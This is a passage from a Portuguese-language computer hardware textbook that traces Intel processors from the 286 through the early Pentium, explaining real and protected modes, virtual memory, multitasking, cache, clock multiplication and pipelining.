vos ao bloco 1 e carregar os endereços do bloco 2. Neste momento,
o processador perde o acesso ao bloco 1 e passa a enxergar apenas
o segundo bloco. Quando novamente for preciso ler ou gravar dados
no bloco 1 (ou qualquer outro bloco), novamente são carregados os
endereços relativos a ele, e o acesso ao bloco 2 será perdido. É mais
ou menos como se você precisasse fazer anotações em várias pági-
nas de um caderno. Como só é possível ler ou escrever em uma pá-
gina de cada vez, você precisaria ficar continuamente virando as pá-
ginas.

286

O processador 286 foi lançado em Fevereiro de 1982, apenas 6 me-


ses após a IBM ter lançado o seu primeiro PC. Porém, o 286 passou
a ser utilizado apenas em 1984, quando a IBM lançou o seu PC AT.
Esta demora é justificável, pois, para lançar um computador usando o
novo processador da Intel, foi preciso desenvolver toda uma nova
arquitetura. Da placa de vídeo ao gabinete, praticamente tudo foi
mudado, o que somado à burocracia e a longos períodos de testes
antes do lançamento, demandou um certo tempo.

Atualmente, o período de desenvolvimentos dos periféricos é muito


mais curto. Quase sempre quando um novo processador é lançado,
já temos placas mãe para ele disponíveis quase que imediatamente,
pois o desenvolvimento é feito de forma simultânea.

O 286 trouxe vários avanços sobre o 8088. Ele utilizava palavras


binárias de 16 bits tanto interna quanto externamente, o que permitia
o uso de periféricos de 16 bits, muito mais avançados do que os usa-
dos no PC original e no XT. O custo destes periféricos desta vez não
chegou a ser um grande obstáculo, pois enquanto o PC AT estava
sendo desenvolvido, eles já podiam ser encontrados com preços mais
acessíveis.

O principal avanço trazido pelo 286 são seus dois modos de opera-
ção, batizados de “Modo Real” e “Modo Protegido”. No modo real,
o 286 se comporta exatamente como um 8086 (apesar de mais rápi-
do), oferecendo total compatibilidade com os programas já existentes.

185
Já no modo protegido, ele manifesta todo o seu potencial, incorpo-
rando funções mais avançadas, como a capacidade de acessar até
16 Megabytes de memória RAM (usando os 24 bits de endereçamen-
to do 286), multitarefa, memória virtual em disco e proteção de me-
mória.

Assim que ligado, o processador opera em modo real, e com uma


certa instrução, passa para o modo protegido. O problema é que tra-
balhando em modo protegido, o 286 deixava de ser compatível com
os programas escritos para o modo real, inclusive com o próprio MS-
DOS. Para piorar, o 286 não possuía nenhuma instrução que fizesse
o processador voltar ao modo real, isto era possível apenas resetan-
do o micro. Isso significa que um programa escrito para rodar em
modo protegido, não poderia usar nenhuma das rotinas de acesso a
dispositivos do MS-DOS, tornando inacessíveis o disco rígido, placa
de vídeo, drive de disquetes memória, etc., a menos que fossem de-
senvolvidas e incorporadas ao programa todas as rotinas de acesso a
dispositivos necessárias. Isso era completamente inviável para os
desenvolvedores, pois para projetar um simples jogo, seria pratica-
mente preciso desenvolver todo um novo sistema operacional. Além
disso, o programa desenvolvido rodaria apenas em micros equipados
com processadores 286, que ainda eram minoria na época, tendo um
público alvo muito menor. De fato, apenas algumas versões do UNIX
e uma versão do OS/2 foram desenvolvidas para utilizar o modo pro-
tegido do 286.

Basicamente, os micros baseados no 286 eram usados para rodar


aplicativos de modo real, que também podiam ser executados em um
XT, aproveitando apenas a maior velocidade do 286.

Falando em velocidade, a primeira versão do 286 funcionava a ape-


nas 6 MHz, sendo lançada logo depois uma nova versão de 8 MHz,
que foi usada no PC AT. Posteriormente, foram desenvolvidas ver-
sões de até 20 MHz.

Devido às várias mudanças na arquitetura, destacando o acesso mais


rápido à memória e alterações no conjunto de instruções do proces-
sador, que permitiam realizar muitas operações de maneira mais

186
rápida e eficiente, um 286 consegue ser quase 4 vezes mais rápido
que um 8088 do mesmo clock.

386

O 386 foi lançado apenas em Outubro de 85, três anos e meio depois
do 286. Desta vez, a diretoria da IBM demorou muito para chegar à
um acordo e desenvolver um sistema baseado no 386, dando tempo
para a Compaq sair na frente. Este foi um verdadeiro marco pois, de
repente, as companhias perceberam que não eram mais obrigadas a
seguir a IBM. Qualquer um que tivesse tecnologia suficiente poderia
sair na frente, como fez a Compaq. A partir daí, a IBM começou a
gradualmente perder a liderança do mercado, tornando-se apenas
mais um entre inúmeros fabricantes de PCs.

O 386 trouxe vários recursos novos. Para começar, o 386 trabalha


tanto interna quanto externamente com palavras de 32 bits e é capaz
de acessar a memória usando um barramento de 32 bits, permitindo
uma transferência de dados duas vezes maior. Como o 386 pode
trabalhar com palavras binárias de 32 bits, é possível acessar até 4
GB de memória (2 elevado à 32º potência), mesmo sem usar a seg-
mentação de endereços, como no 8088 e no 286.

Assim como o 286, o 386 continua possuindo os dois modos de ope-


ração. A diferença é que no 386 já é possível alternar entre o modo
real e o modo protegido livremente. Um programa que rode sobre
DOS, pode chavear o processador para o modo protegido, para bene-
ficiar-se de suas vantagens, e voltar ao modo real sempre que preci-
sar usar alguma sub-rotina do DOS, de maneira transparente ao usu-

187
ário. Neste caso, é usado um programa de DPMI (“DOS Protected
Mode Interface”, ou “interface DOS de modo protegido”) para fazer o
chaveamento entre os dois modos.

Toda vez que o programa precisa usar alguma sub-rotina do DOS,


ele passa o comando ao chaveador e fica esperando. O chaveador
por sua vez, passa o processador para o modo real, executa o co-
mando, chaveia o processador para o modo protegido e entrega o
resultado ao aplicativo, que continua trabalhando como se nada ti-
vesse acontecido.

Um bom exemplo de programa de DPMI é o DOS4GW, que é usado


por muitos jogos que rodam sobre o MS-DOS, como o Doom, Sim
City 2000 e vários emuladores de vídeo games.

O esquema de chaveamento também é utilizado pelo Windows 3.x,


que já inclui todas as rotinas necessárias, dispensando qualquer pro-
grama de DPMI. O Windows 95/98 também pode chavear para o
modo real caso precise carregar algum driver de dispositivo de modo
real. Porém, devido ao modo virtual 8086, que veremos logo a seguir,
não é preciso colocar o processador em modo real para executar
aplicativos MS-DOS dentro do Windows 95/98 Ter um processador
386 é o requisito mínimo para rodar qualquer sistema operacional ou
aplicativo de modo protegido moderno.

Com um 386, um mínimo de memória RAM e espaço em disco sufici-


ente, você pode rodar o Windows 95 e a maioria dos aplicativos para
ele, embora bem lentamente devido à pouca potência do processa-
dor. Com um simples 286, no máximo você poderá rodar o DOS e
aplicativos mais simples, que trabalhem somente com o modo real.

Também é possível rodar o Windows 3.0, porém em modo “Stan-


dard”, onde é possível acessar todos os 16 MB de memória permiti-
dos pelo 286, mas sem memória virtual nem multitarefa.

188
A Introdução do Cache

Os processadores 386 acima de 20 MHz eram muito rápidos para as


memórias RAM existentes na época. Por isso, a cada acesso, o pro-
cessador tinha que ficar “esperando” os dados serem liberados pela
memória RAM para poder concluir suas tarefas, perdendo muito em
desempenho. Para solucionar esse problema, passaram a ser usadas
pequenas quantidades de memória cache na grande maioria das
placas mãe para micros 386 e superiores.

A memória cache é um tipo de memória ultra-rápida, que armazena


os dados mais usados pelo processador, evitando na grande maioria
dos casos, que ele precise perder tempo buscando dados diretamen-
te na lenta memória RAM. Mesmo uma pequena quantidade de me-
mória cache é capaz de melhorar bastante a velocidade da troca de
dados entre o processador e a RAM.

Apesar de já ser bem mais rápido que a memória RAM, o 386 ainda
não era um processador muito rápido, justamente por isso, ainda não
era tão dependente do desempenho da memória cache quanto os
processadores atuais. Um 386 equipado com memória cache é de 20
a 30% mais rápido que um 386 da mesma frequência, mas sem me-
mória cache, enquanto um processador moderno pode ficar até 20
vezes mais lento caso sejam desabilitados tanto o cache L1 quanto o
cache L2.

386SX

Como o 386 era um processador de 32 bits, foi preciso desenvolver


toda uma nova categoria de chipsets e circuitos de apoio para traba-

189
lhar com ele, o que acabou encarecendo bastante os sistemas base-
ados no 386 e afastando muitos compradores em potencial.

Para contornar este problema, a Intel optou por lançar uma versão de
baixo custo do 386, batizada de 386SX, que apesar de continuar fun-
cionando internamente com palavras de 32 bits, comunicava-se com
a memória RAM e os demais periféricos usando palavras de 16 bits
(como o 286). Apenas para diferenciar os dois processadores, a Intel
passou a chamar o 386 original de 386DX.

Esta arquitetura permitiu que fossem aproveitados os mesmos perifé-


ricos usados em placas de micros 286, tornando as máquinas basea-
das no 386SX muito mais acessíveis. Pra se ter uma ideia, um PC
básico equipado com um 386SX, chegava a custar menos de 1,000
dólares, quase metade de um equipamento com uma configuração
parecida baseado no 386DX.

Apesar de, devido ao preço, o 386SX ter tornando-se uma boa opção
em termos de custo beneficio, em termos de performance ele fica
bem atrás de um 386DX da mesma frequência, pois apesar de inter-
namente os processadores serem idênticos, o SX usa praticamente
os mesmos componentes usados nos micros 286, acessa a memória
usando palavras de 16 bits e, para completar, as placas mãe para ele
não possuem memória cache.

190
Modo Real x Modo Protegido

Operando em modo real, o processador funciona exatamente como


um 8086, apenas trabalhando com uma velocidade maior. Não so-
mente o 386, mas todos os processadores atuais podem alternar
entre o modo real e o modo protegido livremente, sempre que neces-
sário. No modo real, rodamos o MS-DOS e outros aplicativos de mo-
do real mais antigos, enquanto no modo protegido rodamos o Win-
dows e seus programas.

Com certeza, alguma vez ao tentar rodar um programa antigo, você já


se deparou com uma enigmática mensagem de falta de memória,
apesar dos manuais do programa dizerem que ele precisa apenas de
500 ou 600 KB de memória e você ter instalado bem mais do que
isso. Estas mensagens surgem por que estes programas rodam com
o processador operando em modo real onde, como o 8086, ele é
capaz de reconhecer apenas o primeiro Megabyte da memória RAM.
Este primeiro Megabyte por sua vez, é subdividido em dois blocos,
chamados de memória convencional e memória estendida.

A memória convencional corresponde aos primeiros 640 Kbytes da


memória, e é a área de memória usada pelos programas que operam
em modo real. Os 384 Kbytes restantes são chamados de memória
superior, e são reservados para armazenar uma cópia do BIOS, que
passa a ser executado mais rapidamente, já que a memória RAM é
muito mais rápida do que o chip de memória ROM ou Flash onde ele
é originalmente armazenado. Esta cópia do BIOS é chamada de
“Shadow”, ou sombra, e serve para aumentar o desempenho geral do
sistema. A memória superior também é usada para armazenar som-
bras dos BIOS de outros dispositivos, como placas de vídeo, aumen-
tando também a velocidade de operação destes periféricos.

Apesar de existirem 640 Kbytes de memória convencional, prontas


para serem usadas por qualquer programa que opere em modo real,
nem toda esta memória fica disponível, já que parte dela é usada pelo
MS-DOS e drivers de dispositivos de modo real. É possível liberar
mais memória convencional, editando os arquivos de inicialização do
DOS, conseguindo assim rodar estes programas.

191
Quando o computador é ligado, o processador está operando em
modo real. Quem dá o comando para que ele mude para o modo
protegido é o sistema operacional. No caso do Windows, este co-
mando é dado durante o carregamento do sistema.

Em modo protegido, o processador é capaz de reconhecer toda a


RAM instalada no sistema, além de incorporar recursos como a multi-
tarefa e a memória virtual em disco. É neste modo que usamos a
interface gráfica do Windows e rodamos seus aplicativos.

Recursos do Modo Protegido

Apesar de, em nome da compatibilidade retroativa com programas


desenvolvidos para micros PC XT e 286, tanto o 386 como todos os
processadores atuais poderem operar em modo real, apenas no mo-
do protegido eles incorporam os recursos mais avançados, que per-
mitem a existência dos softwares que temos atualmente.

A partir do 386, poucas funções novas foram incorporadas aos novos


processadores. Basicamente, evoluímos apenas em termos de velo-
cidade. Tanto que, com um simples 386, é possível rodar praticamen-
te qualquer aplicativo mais atual, apenas com uma velocidade menor.

O modo protegido traz basicamente quatro novos recursos: memória


virtual, multitarefa, proteção de memória e o modo virtual 8086.

Memória Virtual

A capacidade do 386 de trabalhar com vários aplicativos ao mesmo


tempo (multitarefa) é realmente muito útil, mas esta característica traz
um pequeno problema: abrindo vários aplicativos sucessivamente,
logo a memória RAM do sistema se esgota. Para corrigir este pro-
blema, o modo protegido traz também a memória virtual, que permite
criar um arquivo temporário no disco rígido, chamado de Swap File,
ou arquivo de troca, que funciona como uma extensão da memória
RAM, permitindo abrir quantos aplicativos forem necessários, até que
o espaço do disco rígido se esgote.

192
Por exemplo, só o Windows 2000 Professional, junto com os serviços
básicos ocupa cerca de 40 MB de memória. Se você abrir o Word 97,
serão necessários mais 10 Megabytes, um total de quase 50 MB.
Caso o micro em questão possua apenas 32 MB de memória, seria
criado um arquivo temporário de 18 MB no disco rígido, que armaze-
naria os dados que não couberam na memória RAM.

O problema em usar memória virtual é que o disco rígido é centenas


de vezes mais lento do que a memória RAM. Um disco rígido razoá-
vel possui um tempo de acesso em torno de 10 milessegundos (milé-
simos de segundo) enquanto um módulo de memória PC-100 possui
um tempo de acesso inferior a 10 nanossegundos (bilionésimos de
segundo) ou seja, um tempo de acesso um milhão de vezes menor.
Em termos de taxa de transferência, novamente temos um contraste
marcante: 800 MB para o módulo de memória e de 5 a 20 MB (de-
pendendo do modelo) para o disco rígido.

Graças a este abismo, apesar dos programas funcionarem normal-


mente usando memória virtual, o sistema vai ficando cada vez mais
lento. Experimente, por exemplo, tentar trabalhar em um PC com
apenas 4 MB de RAM (seja qual for o processador) rodando o Win-
dows 95. A lentidão é insuportável.

No Windows 3.x, era necessário reservar uma quantidade espaço do


disco rígido para a memória virtual, quantidade que podia ser configu-
rada livremente através do Painel de Controle. O problema é que este
espaço ficava indisponível. Se você possuísse um disco de 800 MB, e
reservasse 200 para a memória virtual, ficaria com apenas 600 MB
para instalar programas e guardar arquivos. Se por outro lado, você
reservasse pouco espaço para a memória virtual, ficaria com pouca
memória para abrir vários programas e trabalhar com arquivos gran-
des.

A partir do Windows 95 este problema foi resolvido com a adoção de


um arquivo de troca dinâmico, que vai aumentando ou diminuindo de
tamanho conforme a necessidade de memória, evitando o desperdí-
cio de espaço em disco que tínhamos no Windows 3.x. Apartir do
Windows 95, existe também uma administração mais racional dos
recursos do sistema, movendo os arquivos mais importantes, aces-

193
sados com mais frequência para memória RAM (ou memória cache,
dependendo da importância do arquivo), e deixando apenas arquivos
usados mais raramente no arquivo de troca. Esta simples medida
diminui bastante a perda de performance causada pelo uso da memó-
ria virtual.

No Windows 2000 é possível determinar um valor inicial e um valor


máximo para um arquivo de troca. No caso do Linux, a fim de melho-
rar o desempenho, os desenvolvedores optaram por criar um sistema
de arquivos próprio para a memória virtual.

Multitarefa

Multitarefa significa executar mais de uma tarefa de cada vez, como


assobiar e chupar cana ao mesmo tempo. Apesar de na vida real não
ser muito fácil fazer duas coisas ao mesmo tempo, do ponto de vista
de um computador este processo é relativamente simples. Todos os
aplicativos são carregados na memória e o processador passa a exe-
cutar algumas instruções de cada aplicativo por vez. Como o proces-
sador é capaz de executar vários milhões de instruções por segundo,
esta troca é feita de maneira transparente, como se os aplicativos
estivessem realmente sendo executados ao mesmo tempo. Enquanto
o processador dá atenção para um aplicativo, todos os demais ficam
paralisados, esperando sua vez.

Memória Protegida

Usando a multitarefa, quase sempre teremos vários aplicativos carre-


gados na memória, seja na memória RAM ou no arquivo de troca. Se
não houvesse nenhum controle por parte do processador, um aplica-
tivo poderia expandir sua área de memória, invadindo áreas de outros
aplicativos e causando travamentos no micro.

Um editor de imagens, por exemplo, precisa ocupar mais memória


conforme as imagens vão sendo abertas ou criadas. Sem nenhuma
orientação por parte do processador, simplesmente seriam ocupadas
as áreas adjacentes, que poderiam tanto estar vazias, quanto estar
ocupadas pelo processador de textos, por exemplo.

194
Para colocar ordem na casa, foi desenvolvido o recurso de proteção
de memória, que consiste no processador isolar a área de memória
ocupada por cada aplicativo, impedindo que ele ocupe outras áreas
ao seu bel prazer. Se, por acaso, o programa precisar de mais memó-
ria, o próprio processador irá procurar uma área vazia de memória e
ordenar ao aplicativo que ocupe a área reservada.

Existem basicamente dois tipos de multitarefa, denominadas multita-


refa preemptiva e multitarefa cooperativa, que diferem justamente
pelo uso ou não da proteção de memória.

O Windows 3.x, apesar de ser considerado um sistema operacional


multitarefa, não é capaz de usar o recurso de proteção de memória,
nele é usada a multitarefa cooperativa, que consiste em cada aplicati-
vo usar os recursos do processador por um certo tempo, passar para
outro programa e esperar novamente chegar sua vez para continuar
executando suas tarefas. A alternância entre os programas neste
caso não é comandada pelo sistema e sim pelos próprios aplicativos.
Neste cenário, um aplicativo mal comportado poderia facilmente mo-
nopolizar o sistema, consumindo todos os recursos do processador
por um longo período, ou mesmo invadir áreas de memória ocupadas
por outros aplicativos, causando em qualquer um dos casos o famoso
GPF, (“General Protection Falt”, ou “falha geral de proteção”) que
tanto atormentava os usuários do Windows 3.x. Experimente tentar
fazer dois irmãos dividirem os mesmo brinquedo; pode funcionar du-
rante um certo tempo, mas uma hora um não vai querer deixar o ou-
tro brincar e vai sair briga, exatamente como acontece com os aplica-
tivos dentro da multitarefa cooperativa.

O Windows 95/98 por sua vez, usa a multitarefa preemptiva, isolando


as áreas de memória ocupadas pelos aplicativos. Isto garante uma
estabilidade bem maior do que a que temos no Windows 3.11. Po-
rém, o modo como a multitarefa preemptiva é implementada no Win-
dows 95 assim como do Windows 98 e do Windows Millennium, que
são baseados no mesmo kernel (núcleo) do Windows 95, ainda pos-
sui dois problemas graves: O primeiro é que, quando é executado um
programa de 16 bits, o Windows 95 cai em multitarefa cooperativa
para poder rodar o programa, deixando de proteger as áreas de me-
mória e tornando-se tão vulnerável quanto o Windows 3.11. Porém,

195
mesmo usando apenas aplicativos de 32 bits os travamentos ainda
são comuns, pois no Windows 95 os serviços do sistema não tem
prioridade sobre os aplicativos. Isto significa que caso um aplicativo
qualquer entre em loop, poderá consumir todos os recursos do pro-
cessador, neste caso o sistema operacional ficará paralisado, sim-
plesmente sem ter como fechar o aplicativo e restaurar o sistema,
obrigando o usuário a resetar o micro e perder qualquer trabalho que
não tenha sido salvo. Na verdade costuma-se dizer que o Windows
95/98 utiliza multitarefa semipreemptiva, pois não utiliza todos os
recursos de uma verdadeira multitarefa.

A solução para este problema veio com o Windows NT. Desde suas
primeiras versões, o Windows NT é bem estável neste aspecto, pois
implementa a multitarefa preemptiva de forma completa. As tarefas
executadas pelo sistema operacional, são priorizadas sobre as de
qualquer outro aplicativo. Isto significa que em nenhuma situação, um
aplicativo terá como passar por cima do sistema operacional e con-
sumir todos os recursos do processador como acontece no Windows
95/98.

Na prática, significa que o sistema até pode travar devido a algum


bug, mas se algum aplicativo travar ou tentar invadir uma área de
memória não designada para ele, simplesmente será fechado, permi-
tindo que todos os demais aplicativos continuem trabalhando sem
problemas. Você logo notará quais aplicativos costumam dar proble-
mas, bastando substituí-los por versões mais recentes que corrijam
seus bugs ou mesmo passar a usar um programa concorrente.

Tanto o Windows 2000, quanto o XP são baseados no kernel do Win-


dows NT e mantém o mesmo sistema de funcionamento. Por ter sido
inspirado no Unix, o Linux utiliza multitarefa preemptiva desde suas
primeiras versões, é por isso que o Linux é considerado um dos sis-
temas mais estáveis, a ponto de ser usado em vários dos mais impor-
tantes servidores do planeta.

O MacOS por sua vez, utilizou a multitarefa cooperativa durante muito


mais tempo, até a versão 9.x. Os usuários dos Mac só passaram a ter
disponível um sistema com multitarefa preemptiva a partir do MacOS
X, que é baseado no FreeBSD, um sistema Unix de código aberto,

196
semelhante ao Linux em vários aspectos. A Apple usou o FreeBSD
para construir o Darwin, que é a base do sistema e completou a obra
com a interface Aqua, que mantém a ideia de facilidade de uso das
versões anteriores do MacOS.

Modo Virtual 8086

Apesar de, operando em modo real, o processador ser totalmente


compatível com qualquer programa antigo, seria impossível executar
um aplicativo de modo real dentro do Windows 95 ou qualquer outro
sistema operacional que utilize o modo protegido. Seria preciso fe-
char o Windows e fazer o processador voltar para o modo real para
poder executar o aplicativo.

Pensando nesta possível limitação, os projetistas da Intel desenvolve-


ram o modo virtual 8086 onde o processador, operando em modo
protegido, é capaz de simular vários ambientes de modo real, cada
um com 1 MB de memória e total acesso ao hardware do micro, cha-
mados de máquinas virtuais. É como se dentro do 386 fossem aber-
tos vários XTs completos, um para cada programa de modo real a ser
executado. É justamente o modo virtual 8086 que permite abrir jane-
las DOS dentro do Windows 95/98.

Como o processador continua em modo protegido, cada máquina


virtual tem sua área isolada na memória. O programa roda sem pre-
judicar a estabilidade do sistema.

486

O 386 foi o grande marco dos processadores para micros PC, pois foi
o primeiro processador a trazer o conjunto de instruções x86, que são
suportadas por todos os processadores modernos.

A partir dele, surgiram vários melhoramentos, mas apenas em termos


de desempenho. Apesar de não trazer instruções novas, o 486 con-
quistou seu lugar na história, por trazer vários recursos que continu-
am sendo usados até os processadores atuais. Em primeiro lugar, o
486 foi o primeiro processador a trazer cache integrado. Eram 8
Kbytes, mas que eram capazes de entregar dados a cada ciclo do

197
processador. Como os fabricantes continuaram incluindo cache na
placa mãe, um pouco mais lentos, mas em maior quantidade, surgiu
também a distinção entre o cache L1 e o L2.

Outra evolução foi o coprocessador aritmético. Ao invés do caríssimo


componente que deveria ser adquirido separadamente, o coproces-
sador passou a ser um item de série. Este foi o impulso que faltava
para a popularização de vários programas e o surgimento de jogos
bem mais elaborados.

Com tudo isso, um 486 é quase duas vezes mais rápido do que um
386 da mesma frequência. Em alguns aplicativos, que dependem do
coprocessador aritmético, um 486 chega a ser 10 vezes mais rápido.

Como fez anteriormente com o 386, a Intel criou um 486 de baixo


custo chamado de 486SX. A diferença entre o SX e o 486 original, é
que passou a ser chamado de 486DX. Os dois compartilhavam a
mesma arquitetura, mas o SX vinha sem o coprocessador aritmético,
o que o tornava muito mais lento em aplicativos gráficos e científicos.

Para os proprietários, existia a opção de posteriormente comprar um


80487SX, um coprocessador aritmético que era vendido separada-
mente. O problema era que comprado separadamente, o coproces-
sador custava quase tanto quanto um processador 486DX que já
vinha com o coprocessador embutido, definitivamente um péssimo
negócio. Para evitar confusão, o 486 original passou a ser chamado
de 486DX.

Foram lançadas versões do 486 rodando à 25 MHz, 33 MHz e 40


MHz, porém, criou-se uma barreira, pois não haviam na época circui-
tos de apoio capazes de trabalhar a mais de 40 MHz.

Para solucionar esse problema, foi criado o recurso de Multiplicação


de Clock, através do qual o processador trabalha internamente à
uma velocidade maior do que a da placa mãe. Foram lançados então
os processadores 486DX2 (que trabalhavam ao dobro da frequência
da placa mãe) e logo depois os 486DX4 (que trabalhavam ao triplo da
frequência da placa mãe):

198
486DX-2 50 MHz 25 MHz 2x
486DX-2 66 MHz 33 MHz 2x
486DX-2 80 MHz 40 MHz 2x
486DX-4 75 MHz 25 MHz 3x
486DX-4 100 MHz 33 MHz 3x
486DX-4 120 MHz 40 MHz 3x

Com isso, surgiram também as placas mãe upgradable, que permi-


tem atualizar o processador, apenas configurando alguns jumpers da
placa.

Os processadores 486, a partir do DX-33 foram os primeiros a utilizar


cooler, que naquela época eram dissipadores com menos de um cen-
tímetro de altura, com exaustores minúsculos.

Conforme os processadores passaram a dissipar cada vez mais ca-


lor, os coolers foram crescendo na mesma proporção, até chegar nos
exageros que vemos atualmente.

Multiplicação de Clock

Dentro de qualquer computador, os dados são transmitidos e proces-


sados na forma de sinais elétricos. O processador é muito pequeno,
não mede mais do que 1, ou 1,2 centímetros quadrados. A placa mãe
por sua vez é muito maior que isso.

Graças a esta diferença de proporções, acaba sendo muito mais fácil


desenvolver um processador capaz de operar a, digamos, 2 giga-
hertz, do que uma placa mãe capaz de acompanha-lo. Apesar dos

199
sinais elétricos percorrerem os circuitos a uma velocidade próxima da
da luz, estamos falando de bilhões de transmissões por segundo.

O recuso de multiplicação de clock surgiu para evitar que os proces-


sadores ficassem limitados à frequência da placa mãe. Num Pentium
III de 800 MHz por exemplo, a placa mãe opera a apenas 100 MHz. O
multiplicador é de 8x.

Hoje em dia os processadores trazem tanto cache L1, quanto cache


L2 integrados, operando na mesma frequência do restante do pro-
cessador, o que diminui muito a dependência da velocidade da me-
mória RAM, que sempre opera na mesma frequência de a placa mãe,
meros 100 ou 133 MHz. Mesmo assim, quanto maior for o multiplica-
dor, maior será a perda de desempenho. Um bom exemplo disso, é
uma comparação entre o Celeron 766 (que usa bus de 66 MHz) e o
Celeron 800 (que já usa bus de 100 MHz). Apesar da frequência de
operação ser quase a mesma, o Celeron 800 chega a ser 20% mais
rápido, graças ao acesso mais rápido à memória.

Apesar das limitações, o recurso de multiplicação de clock é indis-


pensável atualmente, pois sem ele seria impossível desenvolver pro-
cessadores muito rápidos, já que não é possível aumentar a frequên-
cia das placas mãe e dos demais periféricos na mesma proporção do
aumento do clock nos processadores. Se o Pentium III, por exemplo,
tivesse que trabalhar na mesma frequência da placa mãe, não passa-
ríamos de 100 ou 133 MHz.

Nos PCs 486, Pentium, MMX e K6 é necessário configurar o multipli-


cador manualmente, através de alguns jumpers da placa mãe. É uma
maravilha, principalmente quando você não têm o manual da placa
em mãos. Mas, a partir do Pentium II, a placa é capaz de detectar
automaticamente o multiplicador. Na verdade, a partir do Pentium II,
todos os processadores Intel têm o seu multiplicador travado ainda na
fábrica. Não é possível alterá-lo mesmo que queira.

Pipeline

Até o 386, os processadores da família x86 eram capazes de proces-


sar apenas uma instrução de cada vez. Uma instrução simples podia

200
ser executada em apenas um ciclo de clock, enquanto instruções
mais complexas demoravam vários ciclos de clock para serem con-
cluídas. Seria mais ou menos como montar um carro de maneira ar-
tesanal, peça por peça.

Para melhorar o desempenho do 486, a Intel resolveu usar o pipeline,


uma técnica inicialmente usada em processadores RISC, que consis-
te em dividir o processador em vários estágios distintos.

O 486, possui um pipeline de 5 níveis, ou seja, é dividido em 5 está-


gios.

Quando é carregada uma nova instrução, ela primeiramente passa


pelo primeiro estágio, que trabalha nela durante apenas um ciclo de
clock, passando-a adiante para o segundo estágio. A instrução conti-
nua então sendo processada sucessivamente pelo segundo, terceiro,
quarto e quinto estágios do processador. A vantagem desta técnica, é
que o primeiro estágio não precisa ficar esperando a instrução passar
por todos os demais para carregar a próxima, e sim carregar uma
nova instrução assim que se livra da primeira, ou seja, depois do pri-
meiro pulso de clock.

As instruções trafegam dentro do processador na ordem em que são


processadas. Mesmo que a instrução já tenha sido processada ao
passar pelo primeiro ou segundo estágio, terá que continuar seu ca-
minho e passar por todos os demais. Se por acaso a instrução não
tenha sido completada mesmo após passar pelos 5, voltará para o
primeiro e será novamente processada, até que tenha sido concluída.

Desta maneira, conseguimos que o processador seja capaz de pro-


cessar simultaneamente, em um único ciclo de clock, várias instru-
ções que normalmente demorariam vários ciclos para serem proces-
sadas. Voltando ao exemplo do carro, seria como se trocássemos a
produção artesanal por uma linha de produção, onde cada departa-
mento cuida de uma parte da montagem, permitindo montar vários
carros simultaneamente.

201
O uso dos 5 estágios de pipeline no 486 não chega a multiplicar por
cinco a performance do processador, na verdade a performance não
chega nem mesmo a dobrar, mas o ganho é bem significativo.

Pentium

Assim como o 486, o Pentium é um processador de 32 bits, capaz de


acessar até 4 GB de memória RAM. Mas, novamente o processador
trouxe várias melhorias que o tornaram muito mais rápido que a gera-
ção anterior. Não é à toa que o primeiro Pentium operava a apenas
60 MHz, e era, na época do lançamento, muito mais caro que um
486DX4-100. O Pentium é de 65 a 100% mais rápido que um 486 do
mesmo clock. Como o processador aritmético também foi completa-
mente remodelado, o Pentium acaba sendo ainda mais rápido em
aplicativos que demandam um grande número de cálculos.

Os processadores Pentium existiram em versões de 60 a 200 MHz,


sempre utilizando multiplicação de clock (com exceção apenas para
as versões de 60 e 66 MHz).

Pentium 60, 90, 120, 150 e 180 MHz


60 MHz Respectivamente 1x, 1.5x, 2x, 2.5x e 3x
Pentium 66, 100, 133, 166 e 200 MHz
66 MHz Respectivamente 1x, 1.5x, 2x, 2.5x e 3x
Pentium 75 MHz 50 MHz 1.5 x
Pentium 200 MHz 66 MHz 3 x

Como na época dos micros 486, as placas mãe para processadores


Pentium (com excessão de placas muito antigas) suportam várias
frequências de barramento e vários multiplicadores distintos. Na mai-
oria dos casos é possível configurar a placa mãe para utilizar qual-
quer processador da família.

202
Melhorias no Cache L1

A primeira mudança trazida pelo Pentium foi o aumento da quantida-


de de cache L1, que passou a ser de 16 KB, o dobro do 486. Além do
aumento da capacidade, foram implementados três novos recursos,
que tornaram o cache ainda mais eficiente: A primeira medida foi a
divisão do cache em dois blocos de 8 KB, um dedicado a armazenar
dados e outro dedicado a armazenar instruções. Esta divisão permite
que tanto as instruções a serem executadas pelo processador (com-
paração, multiplicação, soma, decisão, etc.) quanto os dados a serem
processados, possam ser acessados simultaneamente no cache,
aumentando sua eficiência.

Se, por exemplo, um programa qualquer ordena que o processador


leia um número gravado na memória e verifique se ele é maior ou
menor que 10, temos duas instruções (ler o número e compará-lo
com o número 10) e duas variáveis (o número 10 e o número a ser
lido). Com um cache unificado, como no 486, primeiro seriam lidas as
instruções e em seguida as variáveis. No cache dividido do Pentium,
ambos podem ser lidos no mesmo ciclo de clock, poupando tempo.

Outra modificação foi a ampliação do barramento de dados entre o


processador e o cache.
Enquanto no 486 podem ser lidos ou gravados até 128 bits de dados
por ciclo de clock, no Pentium podem ser lidos ou gravados até 256
bits no cache de instruções e mais 256 no cache de dados. Como
ambos os caches podem ser acessados simultaneamente, temos um
barramento total de 512 bits, o quádruplo do que tínhamos no 486!
Este barramento mais largo permite que quantidades maiores de
dados possam ser lidos a partir do cache no mesmo espaço de tem-
po, permitindo ao cache acompanhar a maior velocidade de proces-
samento do Pentium.

A última medida foi a adoção de um cache Write Back, que é capaz


de cachear tanto as operações de leitura de dados na memória RAM,
quanto as operações de escrita. O cache usado no 486, cacheia ape-
nas as operações de leitura, o que permite ao processador ganhar
tempo ao ler dados, mas não ajuda na hora de gravar dados, quando

203
são perdidos vários ciclos até que a memória RAM torne-se disponí-
vel.

Previsão de desvio dinâmico

Após concluída uma instrução do programa, para que o processador


não perca um único ciclo de clock aguardando que o cache ou a me-
mória RAM enviem a próxima instrução a ser processada, foi incluído
no Pentium um buffer de pré extração. Este pequeno circuito armaze-
na as próximas instruções a serem processadas, formando uma es-
pécie de fila. Na verdade, o buffer de pré extração funciona como
uma espécie de cache L0, ficando entre o processador e o cache L1.

A maior utilidade deste buffer é prever o resultado de operações de


tomada de decisão. Se chega ao processador uma instrução como
“Se X > Y então Z = K, senão Z = Q” o buffer irá carregar tanto a ins-
trução seguinte para X < Y quanto para X > Y, fazendo com que seja
qual for o resultado da operação anterior, a próxima instrução já este-
ja carregada no buffer.

O buffer de pré extração também ajuda a memória cache a carregar


antecipadamente os dados que o processador possa precisar. No
caso do exemplo anterior, seriam carregados na memória cache tanto
o valor de K quanto de Q.

Coprocessador Aritmético mais rápido

O coprocessador aritmético do Pentium foi completamente remodela-


